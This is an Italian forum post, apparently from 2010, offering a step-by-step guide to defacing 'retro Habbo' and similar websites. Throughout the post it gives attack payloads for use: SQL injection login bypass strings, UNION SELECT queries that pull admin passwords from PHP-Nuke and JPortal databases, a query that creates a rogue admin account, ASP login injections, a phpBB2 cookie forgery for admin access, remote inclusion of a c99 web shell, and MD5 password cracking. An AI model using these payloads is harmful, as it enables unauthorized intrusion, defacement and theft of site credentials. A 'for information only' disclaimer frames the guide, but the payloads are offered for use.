- 6 Luglio 2010
- 202
- 0
- Miglior risposta
- 0
| Salve a tutti gli utenti dello Sciax2Forum, Inizio col dire che QUESTA GUIDA è STATA CREATA SOLO E SOLTANTO A SCOPO INFORMATIVO, E NE IO E NE LO Sciax2 Forum CI PRENDEREMO ATTO DELL'USO CHE NE FARETE. Detto Ciò Passiamo avanti. Questa è una guida al Defacing di un retro habbo, Allora Iniziamo : PHP Site Per defacciare un sito in PHP potete usare un Remote File Inclusion e siete dentro. Per fare ciò basta scrivere: Perfavore,
Entra
oppure
Registrati
per vedere i Link!
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
(tutto attaccato).Dove al posto di Perfavore,
Entra
oppure
Registrati
per vedere i Link!
ci mettete il vostro sito naturalmente con la c99 (Shell) dentro, che va messa usando l’FTP.Oppure si può usare la tecnica SQL Injection, scrivendo nel login: UserName: ‘or’’=’ Password: ‘or’’=’ Se invece il sito è patchato provvediamo con dei Bug. Proviamo scrivendo nel sito vittima un percorso ke potrebbe portarci all’intera lista di password: Perfavore,
Entra
oppure
Registrati
per vedere i Link!
Se vi vedete spuntare qualcosa allora avrete d’avanti la lista di password in MD5 (un sistema di crittografia per le pass in rete). Per decifrarle salvate tutto in un txt e chiudete la connessione. Andate su un sito per pass MD5 (vedere in fondo alla guida) o usate un programma come “Cain & Abel” (un potentissimo BruteForcer per pass in md5). Se la stringa non ci porta da nessuna parte scriviamo: Perfavore,
Entra
oppure
Registrati
per vedere i Link!
/passwd (tutto attaccato) Se non trovate niente pure questa volta si vede che l’Admin è un pò furbo quindi non vi resta che provare l’ultima alternativa. Andate nel percorso Perfavore,
Entra
oppure
Registrati
per vedere i Link!
/passwd (tutto attaccato) Dove al posto di /mlog.html? è stato scritto /mylog.html?. Se non funziona neanche questo lasciate perdere oppure smanettate un pò PHP-Nuke Site Ora vi illustro 3 exploit moderni e funzionanti; Exploit – Modulo Cerca Andate nel modulo Cerca, ossia la barra dove si mette la parola che vogliamo cercare nel sito e scriviamo: p0hh0nsee%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* premiamo invio e siamo in Root come amministratori. Exploit – Top10 Questo modulo non è presente in tutti i siti in PHP-Nuke, anzi in pochi ormai. Ma con un pò di fortuna lo potremmo trovare e al quel punto basta andare in un percorso del sito e iniettare l’exploit: Perfavore,
Entra
oppure
Registrati
per vedere i Link!
%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd ,1,1%20FROM%20nuke_authors (tutto attaccato). Se funziona ci collegheremo come Admin. Exploit – Sql Injection Scriviamo nella barra degli indirizzi la stringa: Perfavore,
Entra
oppure
Registrati
per vedere i Link!
Avremo come risultato una scritta che dice “Selection from the databse failed!” Se avremo esattamente questo risultato siamo dentro. Con la stringa Perfavore,
Entra
oppure
Registrati
per vedere i Link!
si può creare un nuovo User con privilegi amministrativi con il Nick badangel e Pass topsecret e possiamo fare quello che vogliamo. Se invece volete Nick e Pass tutto vostro allora basta agire sui valori add_aid per il Nick e add_pwd per la PassASP Site In questo caso possiamo usare la tecnica ASP Injection. Ecco varie stringhe da inserire nel Login Utente per avere i permessi Root Diventare Utenti senza Neanche registrarsi: UserName: apostrofo Password: [nessuna password, lasciate vuoto] Accedere da Admin: UserName: ‘ union select Password,1,1,1 from members where UserID = ‘admin’— Password: [nessuna password] Diventare automaticamente amministratori UserName: admin’ – Password: [nessuna pass] Primo utente nella lista UserName: ‘ or 0=0 –sp_password Password: [nessuna pass] HTML Site L’HTML sappiate che, a differenza dei siti in PHP e ASP (che sono linguaggi dinamici), è un linguaggio statico (si chiama anche linguaggio di Markup) o quindi non può essere Hackerato o quasi. L’unico modo per hackerare un sito in html sarebbe quello di trovare qualche Bug nell’FTP o nel Finger. Oltre a questi attacchi possono essere vulnerabili a XSS. PHPBB & PHPBB2 Forum Esistono molti exploit per i forum in PHPBB & PHPBB2, ma sono exploit da compilare in C e da includere nel sito. Quindi per defacciare utilizzando degli exploit bisogna sapere il Linguaggio C. Esiste comunque un bel exploit che ci permette di diventare Root in un forum, l’unica pecca è che dobbiamo usare Firefox. La tecnica che andremo ad utilizzare è Cookie Manipulation. Innanzitutto cancelliamo tutti i Cookie. Entriamo nel sito in PHPBB\2 e usciamo. Adesso utliziamo l’Add-On Extended Cookie Manager 0.8.1 o View Cookies CS 1.0.7 (che ci permettono di modificare i cookie) e apriamo il cookie ke ci ha mandato il forum (l’unico che c’è perchè li abbiamo cancellati tutti prima). Se avremo una scritta del genere 127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D. Sostituiamola con questa: 127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs %3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D (tutto attaccato). Salvate tutto e torniamo al forum. Adesso saremo admin. PS: Smanettando un pò con i cookie potete accedere in Root in molti siti. JPortal Per hackerare un sito in JPortal basta Injettare all’URL un codice (SQL Injection) e poi fare il Login: Perfavore,
Entra
oppure
Registrati
per vedere i Link!
0%20UNION%20SELECT%20id,id,nick,pass,id,id,id,id,i d%20 from%20admins%20LIMIT%201 (tutto attaccato) Qualke sito per decriptare psw in md5 md5.rednoize.com - reverse engineer md5 hashes - powered by rednoize.com Perfavore,
Entra
oppure
Registrati
per vedere i Link!
vi ricordo però CHEQUESTA GUIDA è STATA CREATA SOLO E SOLTANTO A SCOPO INFORMATIVO, E NE IO E NE LO Sciax2 Forum CI PRENDEREMO ATTO DELL'USO CHE NE FARETE. Spero nel rilievo :S e spero di essere stato utile, Aggiungo che la FONTE è MIA ci ho impiegato 2 ore per farlo, e finalmente ve l'ho postata ^^ Evitate commenti inutili come : " potevi non metterla adesso defacciano di più" percé non è problema mio, io l'ho postato a scopo Informativo non Di Lucro, Alla prossima Utenti Dello Sciax2 Forum ;D Ci si sente ^^ |
Molto Dettagliata.